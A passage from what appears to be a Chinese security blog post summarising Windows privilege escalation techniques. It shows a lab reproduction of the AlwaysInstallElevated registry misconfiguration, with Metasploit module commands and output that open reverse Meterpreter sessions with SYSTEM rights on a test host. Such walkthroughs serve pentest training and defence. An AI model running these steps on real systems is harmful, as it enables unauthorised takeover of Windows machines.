session.<br>[*] Sending stage (175174 bytes) to 192.168.199.205<br>[+] Deleted C:\Users\ADMINI~1\AppData\Local\Temp\rrkfyCNqpk.exe<br>[*] Meterpreter session 2 opened (192.168.199.123:4444 -&gt; 192.168.199.205:49163) at 2021-10-16 21:03:07 +0800<br><br>meterpreter &gt; getuid  <span class="hljs-comment"># 得到系统权限的shell</span><br>Server username: NT AUTHORITY\SYSTEM<br></code></pre></td></tr></table></figure>



<img src="/img/Windows提权方式总结/6.gif" srcset="/img/loading.gif" lazyload>



<h3 id="注册表键AlwaysInstallElevated提权"><a href="#注册表键AlwaysInstallElevated提权" class="headerlink" title="注册表键AlwaysInstallElevated提权"></a>注册表键AlwaysInstallElevated提权</h3><h4 id="环境-6"><a href="#环境-6" class="headerlink" title="环境"></a>环境</h4><p>msf Win 10：192.168.199.123</p>
<p>被攻击主机 Windows Server 2008 R2：192.168.199.205</p>
<h4 id="漏洞原理介绍-2"><a href="#漏洞原理介绍-2" class="headerlink" title="漏洞原理介绍"></a>漏洞原理介绍</h4><p>用户开启了Windows Installer特权安装功能，开启该选项，低权限用户在安装.msi文件时会以system权限进行安装</p>
<h4 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h4><p>使用win+r，输入”gpedit.msc”打开组策略编辑器</p>
<ul>
<li>计算机配置-管理模板-Windwos组件-Windows Installer-永远以高特权进行安装-选择”已启用”</li>
<li>用户配置-管理模板-Windwos组件-Windows Installer-永远以高特权进行安装-选择”已启用”</li>
</ul>
<img src="/img/Windows提权方式总结/6.png" srcset="/img/loading.gif" lazyload>



<p>使用msf的windows/local/always_install_elevated模块进行提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ use exploit/windows/<span class="hljs-built_in">local</span>/always_install_elevated<br>$ <span class="hljs-built_in">set</span> session 5<br>$ run<br>[*] Started reverse TCP handler on 192.168.199.123:4444<br>[*] Uploading the MSI to C:\Users\ADMINI~1\AppData\Local\Temp\kUYgEIaSx.msi ...<br>[*] Executing MSI...<br>[*] Sending stage (175174 bytes) to 192.168.199.205<br>[+] Deleted C:\Users\ADMINI~1\AppData\Local\Temp\kUYgEIaSx.msi<br>[*] Meterpreter session 8 opened (192.168.199.123:4444 -&gt; 192.168.199.205:49169) at 2021-10-16 21:55:41 +0800<br><br>meterpreter &gt; getuid  <span class="hljs-comment"># system权限</span><br>Server username: NT AUTHORITY\SYSTEM<br></code></pre></td></tr></table></figure>



<img src="/img/Windows提权方式总结/7.gif" srcset="/img/loading.gif" lazyload>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>
                    
                      <a class="hover-with-bg" href="/tags/Windows/">Windows</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/10/22/Linux%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Linux提权方式总结（未完成）</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/10/02/%E5%B8%B8%E8%A7%81%E7%9A%84Webshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7%E7%9A%84%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81%E5%88%86%E6%9E%90/">
                        <span class="hidden-mobile">常见的Webshell管理工具的流量特征分析</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                

              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?ee9387c15cc7097331ccc74141d07081";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
